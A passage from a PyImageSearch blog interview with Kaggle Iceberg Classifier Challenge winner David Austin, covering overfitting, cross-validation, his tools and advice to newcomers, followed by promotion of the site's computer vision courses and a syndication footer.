Figure 5: The most difficult aspect of the Kaggle Iceberg challenge for David and his teammate was avoiding overfitting.

Adrian: What was the most difficult aspect of the challenge for you and why?

David: The hardest part of the challenge was in validating that we weren’t overfitting.

The dataset size for an image classification problem was relatively small, so we were always worried that overfitting could be a problem. For this reason we made sure that all of our models were done using 4 fold cross validation, which adds to the computational cost, but reduces the overfitting risk. Especially when you’re dealing with an unforgiving loss function like log loss, you have to be constantly on the lookout for overfitting.

Adrian: How long did it take to train your model(s)?

David: Even with the large number of CNN’s that we chose to use, and even with using 4-fold cross validation on the entire set of models, training only took between 1-2 days. Individual models without cross validation could train in some cases on the order of minutes.

Adrian: If you had to pick the most important technique or trick you applied during the competition, what would it be?

David: Without a doubt, the most important step was the up-front exploratory analysis to give a good understanding of the dataset.

It turns out there was a very important signal in the one other feature other than the image data that helped remove a lot of noise in the data.

In my opinion one of the most overlooked steps in any CV or deep learning problem is the upfront work required to understand the data and use that knowledge to make the best design choices.

As algorithms have become more readily available and easy to import, often times there’s a rush to “throw algorithms” at a problem without really understanding if those algorithms are the right one for the job, or if there’s work that should be done before or after training to handle the data appropriately.

Figure 6: David used TensorFlow, Keras, and xgboost in the winning Kaggle submission.

Adrian: What are your tools and libraries of choice?

David: Personally I find Tensorflow and Keras to be amongst the most usable so when working on deep learning problems, I tend to stick to them.

For stacking and boosting, I use xgboost, again primarily due to familiarity and it’s proven results.

In this competition I used my

dl4cv

virtualenv (a Python virtual environment used inside Deep Learning for Computer Vision with Python) and added xgboost to it.

Adrian: What advice would you give to someone who wants to compete in their first Kaggle competition?

David: One of the great things about Kaggle competitions is the community nature of how the competitions work.

There’s a very rich discussion forum and way for participants to share their code if they choose to do so which is really invaluable when you’re trying to learn both general approaches as well as ways to apply code to a specific problem.

When I started on my first competition I spent hours reading through the forums and other high quality code and found it to be one of the best ways to learn.

Adrian: How did the PyImageSearch Gurus course and Deep Learning for Computer Vision with Python book prepare you for the Kaggle competition?

David: Very similar to competing in a Kaggle competition, PyImageSearch Gurus is a learn-by-doing formatted course.

To me there’s nothing that can prepare you for working on problems like actually working on problems and following high quality solutions and code, and one of the things I appreciate most about the PyImageSearch material is the way it walks you through practical solutions with production level code.

I also believe that one of the best ways to really learn and understand deep learning architectures is to read a paper and then go try to implement it.

This strategy is implemented in practice throughout the ImageNet Bundle book, and it’s the same strategy that can be used to modify and adapt architectures like we did in this competition.

I also learned about MiniGoogleNet from the Practitioner Bundle book which I hadn’t come across before and was a model that performed well in this competition.

Adrian: Would you recommend PyImageSearch Gurus or Deep Learning for Computer Vision with Python to other developers, researchers, and students trying to learn computer vision + deep learning?

David: Absolutely. I would recommend it to anyone who’s looking to establish a strong foundation in CV and deep learning because you’re not only going to learn the principals, but you’re going to learn how to quickly apply your learning to real-world problems using the most popular and up to date tools and SW.

Adrian: What’s next?

David: Well, I’ve got a pretty big pipeline of projects I want to work on lined up so I’m going to be busy for a while. There are a couple other Kaggle competitions that look like really fun challenges to work on so there’s a good chance I’ll jump back into those too.

Adrian: If a PyImageSearch reader wants to chat, what is the best place to connect with you?

David: The best way to reach me is my LinkedIn profile. You can connect with Weimin Wang on LinkedIn as well. I’ll also be attending PyImageConf 2018 in August if you want to chat in person.

What about you? Are you ready to follow in the footsteps of David?

Are you ready start your journey to computer vision + deep learning mastery and follow in the footsteps of David Austin?

David is a long-time PyImageSearch reader and has worked through both:

The PyImageSearch Gurus course, an in-depth treatment of computer vision and image processing
Deep Learning for Computer Vision with Python, the most comprehensive computer vision + deep learning book available today

I can’t promise you’ll win a Kaggle competition like David has, but I can guarantee that these are the two best resources available today to master computer vision and deep learning.

To quote Stephen Caldara, a Sr. Systems Engineer at Amazon Robotics:

I am very pleased with the [PyImageSearch Gurus] content you have created. I would rate it easily at a university ‘masters program’ level. And better organized.

Along with Adam Geitgey, author of the popular Machine Learning is Fun! blog series:

I highly recommend grabbing a copy of Deep Learning for Computer Vision with Python. It goes into a lot of detail and has tons of detailed examples. It’s the only book I’ve seen so far that covers both how things work and how to actually use them in the real world to solve difficult problems. Check it out!

Give the course and book a try — I’ll be there to help you every step of the way.

Summary

In today’s blog post, I interviewed David Austin, who, with his teammate, Weimin Wang, won first place (and $25,000) in Kaggle’s Iceberg Classifier Challenge.

David and Weimin’s hard work will help ensure safer, less hazardous travel through iceberg-prone waters.

I am so incredibly happy (and proud) for David and Weimin. Please join me and congratulate them in the comments section of this blog post.

The post An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular image classification competition appeared first on PyImageSearch.

from PyImageSearch https://ift.tt/2G9cejF
via IFTTT

Latest YouTube Video

Saturday, March 31, 2018

Friday, March 30, 2018

Thursday, March 29, 2018

Wednesday, March 28, 2018

An interview with Kwabena Agyeman, co-creator of OpenMV and microcontroller expert

Summary

Tuesday, March 27, 2018

Monday, March 26, 2018

An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular competition

What about you? Are you ready to follow in the footsteps of David?

Summary